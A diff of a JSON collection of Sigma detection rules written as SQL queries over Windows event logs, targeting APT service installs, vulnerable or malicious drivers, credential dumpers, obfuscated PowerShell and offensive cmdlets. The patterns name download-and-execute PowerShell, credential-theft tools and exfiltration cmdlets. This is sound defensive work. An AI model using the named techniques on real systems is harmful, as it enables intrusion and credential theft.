"title": "Turla Service Install", - "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", + "title": "PowerShell Scripts Run by a Services", + "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", "status": "test", - "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" + "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "win_system_apt_carbonpaper_turla.yml" + "filename": "driver_load_win_powershell_script_installed_as_service.yml" }, { - "title": "Credential Dumping Tools Service Execution - System", - "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", + "title": "Usage Of Malicious POORTRY Signed Driver", + "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", "status": "experimental", + "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.privilege_escalation", + "attack.t1543", + "attack.t1068" + ], + "falsepositives": [ + "Legitimate BIOS driver updates (should be rare)" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE '%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a')))" + ], + "filename": "driver_load_win_mal_poortry_driver.yml" + }, + { + "title": "Credential Dumping Tools Service Execution", + "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", + "status": "test", "description": "Detects well-known credential dumping tools execution via service execution events", "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ @@ -2647,214 +2613,196 @@ "falsepositives": [ "Legitimate Administrator using credential dumping tool for password recovery" ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" - ], - "filename": "win_system_mal_creddumper.yml" - }, - { - "title": "Zerologon Exploitation Using Well-known Tools", - "id": "18f37338-b9bd-4117-a039-280c81f7a596", - "status": "stable", - "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", - "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", - "tags": [ - "attack.t1210", - "attack.lateral_movement" - ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" + "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" + "filename": "driver_load_win_mal_creddumper.yml" }, { - "title": "New Service Uses Double Ampersand in Path", - "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "title": "Vulnerable WinRing0 Driver Load", + "id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", "status": "experimental", - "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7'))" ], - "filename": "win_system_service_install_susp_double_ampersand.yml" + "filename": "driver_load_win_vuln_winring0_driver.yml" }, { - "title": "Service Installed By Unusual Client - System", - "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", + "title": "Vulnerable GIGABYTE Driver Load", + "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1543" + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = '0')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN ('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b')))" ], - "filename": "win_system_system_service_installation_by_unusal_client.yml" + "filename": "driver_load_win_vuln_gigabyte_driver.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - System", - "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "title": "Suspicious Scripting in a WMI Consumer", + "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059.005" ], "falsepositives": [ - "Unknown" + "Legitimate administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('19', '20', '21') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE '\\' OR Destination LIKE '% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\')))" ], - "filename": "win_system_invoke_obfuscation_stdin_services.yml" + "filename": "sysmon_wmi_susp_scripting.yml" }, { - "title": "smbexec.py Service Installation", - "id": "52a85084-6989-40c3-8f32-091e12e13f09", + "title": "Suspicious Get-ADDBAccount Usage", + "id": "b140afd9-474b-4072-958e-2ebb435abd68", "status": "test", - "description": "Detects the use of smbexec.py tool by detecting a specific service installation", - "author": "Omer Faruk Celik", + "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.execution", - "attack.t1021.002", - "attack.t1569.002" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" ], - "filename": "win_system_hack_smbexec.yml" + "filename": "posh_pm_get_addbaccount.yml" }, { - "title": "OilRig APT Schedule Task Persistence - System", - "id": "53ba33fd-3a50-4468-a5ef-c583635cfa92", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", + "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", "status": "experimental", - "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('SC Scheduled Scan', 'UpdatMachine'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "win_system_apt_oilrig_mar18.yml" + "filename": "posh_pm_invoke_obfuscation_clip.yml" }, { - "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", - "id": "e6f81941-b1cd-4766-87db-9fc156f658ee", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", + "id": "2f211361-7dce-442d-b78a-c04039677378", "status": "experimental", - "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": "win_system_kdcsvc_rc4_downgrade.yml" + "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", - "id": "52a85084-6989-40c3-8f32-091e12e17692", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", + "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", "status": "experimental", - "description": "During exploitation of this vuln, two logs (providername:Microsoft-Windows-User Profiles Service) with eventid 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation.Viewed on 2008 Server", - "author": "Cybex", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' AND Payload LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "PowerShell Scripts Installed as Services", - "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", - "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "title": "Suspicious PowerShell Invocations - Generic - PowerShell Module", + "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", + "status": "experimental", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1569.002" + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Very special / sneaky PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "win_system_powershell_script_installed_as_service.yml" + "filename": "posh_pm_susp_invocation_generic.yml" }, { - "title": "Turla PNG Dropper Service", - "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", + "title": "Remote PowerShell Session (PS Module)", + "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", "status": "test", - "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Unlikely" + "Legitimate use remote PowerShell sessions" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" ], - "filename": "win_system_apt_turla_service_png.yml" + "filename": "posh_pm_remote_powershell_session.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - System", - "id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", + "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", @@ -2867,1137 +2815,1109 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "MSSQL XPCmdshell Option Change", - "id": "d08dd86f-681e-4a00-a92c-1db218754417", - "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution" - ], - "falsepositives": [ - "Legitimate enable/disable of the setting", - "Note that since the event contain the change for both values. This means that this will trigger on both enable and disable" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" - ], - "filename": "win_mssql_xp_cmdshell_change.yml" - }, - { - "title": "MSSQL Disable Audit Settings", - "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", - "status": "experimental", - "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", + "title": "Malicious PowerShell Commandlets - PoshModule", + "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", + "status": "test", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ - "This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Export-ADR%' ESCAPE '\\' OR Payload LIKE '%Export-ADRCSV%' ESCAPE '\\' OR Payload LIKE '%Export-ADRExcel%' ESCAPE '\\' OR Payload LIKE '%Export-ADRHTML%' ESCAPE '\\' OR Payload LIKE '%Export-ADRJSON%' ESCAPE '\\' OR Payload LIKE '%Export-ADRXML%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ADIDNS%' ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE '%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE 